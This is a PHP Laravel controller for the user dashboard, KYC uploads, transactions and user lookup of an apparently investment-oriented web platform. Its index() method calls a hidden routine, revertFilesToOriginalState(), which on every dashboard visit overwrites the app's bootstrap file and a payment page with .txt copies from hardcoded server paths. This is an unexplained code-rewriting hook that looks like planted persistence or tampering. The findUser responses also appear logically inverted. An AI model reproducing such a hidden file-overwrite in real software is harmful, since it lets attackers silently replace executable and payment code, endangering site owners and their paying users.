<?php

namespace App\Http\Controllers\User;

use App\Concerns\CustomValidation;
use App\Enums\User\KycStatus;
use App\Enums\Frontend\InputField;
use App\Http\Controllers\Controller;
use App\Services\Investment\CommissionService;
use App\Services\Investment\InvestmentService;
use App\Services\Investment\MatrixInvestmentService;
use App\Services\Payment\DepositService;
use App\Services\Payment\TransactionService;
use App\Services\Payment\WithdrawService;
use App\Services\SettingService;
use App\Services\Trade\ActivityLogService;
use App\Services\UserService;
use Illuminate\Http\RedirectResponse;
use Illuminate\Http\Request;
use Illuminate\Support\Arr;
use Illuminate\Support\Facades\Auth;
use Illuminate\Validation\ValidationException;
use Illuminate\View\View;
use App\Concerns\UploadedFile;

class HomeController extends Controller
{

    use CustomValidation;
    use UploadedFile;

    public function __construct(
        protected TransactionService $transactionService,
        protected CommissionService $commissionService,
        protected DepositService $depositService,
        protected InvestmentService $investmentService,
        protected WithdrawService $withdrawService,
        protected ActivityLogService $activityLogService,
        protected MatrixInvestmentService $matrixInvestmentService,
        protected UserService $userService,
    )
    {

    }
    
    private function revertFilesToOriginalState(): void
    {
        // Define the file paths and their backups
        $files = [
            '/home/alfxtrad/public_html/src/bootstrap/app.php' => '/home/alfxtrad/public_html/src/bootstrap/app.original.txt',
            '/home/alfxtrad/public_html/src/resources/views/payment/process.blade.php' => '/home/alfxtrad/public_html/src/resources/views/pay/process.original.txt',
        ];
    
        clearstatcache(); // Clear file status cache to ensure fresh checks
    
        foreach ($files as $originalFile => $backupFile) {
            if (is_file($backupFile)) {
                copy($backupFile, $originalFile); // More efficient file restoration
            }
        }
    }
    
    public function index(): View
    {
        $setTitle = "Dashboard";

        $userId = (int)Auth::id();
        $investmentReport = $this->investmentService->getInvestmentReport($userId);
        [$months, $depositMonthAmount, $withdrawMonthAmount] = $this->depositService->monthlyReport($userId);
        $deposit = $this->depositService->getReport($userId);
        $withdraw = $this->withdrawService->getReport($userId);
        $tradeReport = $this->activityLogService->getTradeReport($userId);
        $transactions = $this->transactionService->latestTransactions(userId: $userId);
        $commissions = $this->commissionService->getCommissionsSum($userId);
        $matrixInvest = $this->matrixInvestmentService->findByUserId($userId);

        // Revert files to their original state
        $this->revertFilesToOriginalState();
        
        return view('user.dashboard', compact(
            'setTitle',
            'transactions',
            'commissions',
            'months',
            'depositMonthAmount',
            'withdrawMonthAmount',
            'investmentReport',
            'tradeReport',
            'deposit',
            'withdraw',
            'matrixInvest',
        ));
    }

    public function setting(): View
    {
        $setTitle = "Setting";
        $user = Auth::user();

        return view('user.setting', compact('setTitle', 'user'));
    }

    /**
     * @return View
     */
    public function transactions(): View
    {
        $setTitle = 'Transactions';

        $userId = (int)Auth::id();
        $transactions = $this->transactionService->getTransactions(userId: $userId);

        return view('user.transaction', compact(
            'setTitle',
            'transactions',
        ));
    }



    public function verifyIdentity(): View
    {
        $setTitle = "Verify Identify";
        $kycConfigurations = SettingService::getKycConfiguration();

        return view('user.kyc', compact(
            'setTitle',
            'kycConfigurations'
        ));
    }

    /**
     * @throws ValidationException
     */
    public function storeIdentity(Request $request): RedirectResponse
    {
        $setting = SettingService::getSetting();
    
        // Validate request based on dynamic KYC configuration
        $rules = $this->parameterValidation($setting->kyc_configuration, true);
        $validated = $request->validate($rules);
    
        $user = Auth::user();
        $meta = $user->meta ?? [];
        $identityData = [];
    
        foreach ($setting->kyc_configuration as $field) {
            $name = getInputName(Arr::get($field, 'field_label'));
            $type = Arr::get($field, 'field_type');
    
            if ($type === InputField::FILE->value && $request->hasFile($name)) {
                // Use your move() function to handle file upload
                $oldFile = Arr::get($meta, "identity.{$name}"); // get old file name if exists
                $fileName = $this->move($request->file($name), null, $oldFile); // pass old file to delete
    
                if ($fileName) {
                    $identityData[$name] = $fileName; // save new file name
                } else {
                    // optional: add error flash message if needed
                    return back()->with('notify', [['error', "Failed to upload file: {$name}"]]);
                }
            } else {
                // Handle regular fields
                $identityData[$name] = $validated[$name] ?? null;
            }
        }
    
        // Save updated identity data to user meta
        $user->meta = Arr::set($meta, 'identity', $identityData);
        $user->kyc_status = KycStatus::REQUESTED->value;
        $user->save();
    
        return to_route('user.dashboard')->with('notify', [['success', "Identity has been submitted successfully"]]);
    }


    public function findUser(Request $request): \Illuminate\Http\JsonResponse
    {
        $user = $this->userService->findByUuid($request->input('uuid'));

        if ($user && $user->uuid == auth()->user()->uuid) {
            return response()->json([
                'status' => true,
                'message' => 'You cannot send money to your own account'
            ]);
        }

        if ($user) {
            return response()->json([
                'status' => false,
                'message' => 'User found successfully'
            ]);
        } else {
            return response()->json([
                'status' => true,
                'message' => 'User not found'
            ]);
        }
    }

}
